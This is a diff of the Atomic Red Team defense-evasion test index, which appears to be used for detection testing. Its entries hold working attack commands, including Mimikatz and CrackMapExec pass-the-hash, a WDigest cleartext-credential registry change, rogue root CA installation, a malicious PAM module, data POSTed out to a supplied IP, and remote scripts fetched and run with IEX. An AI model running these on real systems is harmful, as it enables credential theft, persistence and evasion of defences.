dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl - ' +' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - ' +' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell - ' +' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil - ' +' supported_platforms: - windows input_arguments: @@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} - ' +' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux @@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} - ' +' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} - ' +' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. - ' +' supported_platforms: - windows input_arguments: @@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) - ' +' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. - ' +' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) - ' +' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - ' +' supported_platforms: - windows input_arguments: @@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" - ' +' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null - ' +' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } - ' +' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} - ' +' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' - ' +' name: powershell T1036.004: technique: @@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f - ' +' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times - ' +' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) - ' +' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone @@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" - ' +' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) - ' +' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own MSI" - ' +' executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" - ' +' name: command_prompt T1564.004: technique: @@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore - ' +' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null - ' +' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: @@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete - ' +' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} - ' +' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. - ' +' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe - ' +' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" - ' +' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} - ' +' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f @@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) - ' +' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. - ' +' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} - ' +' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: @@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -34256,13 +34256,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 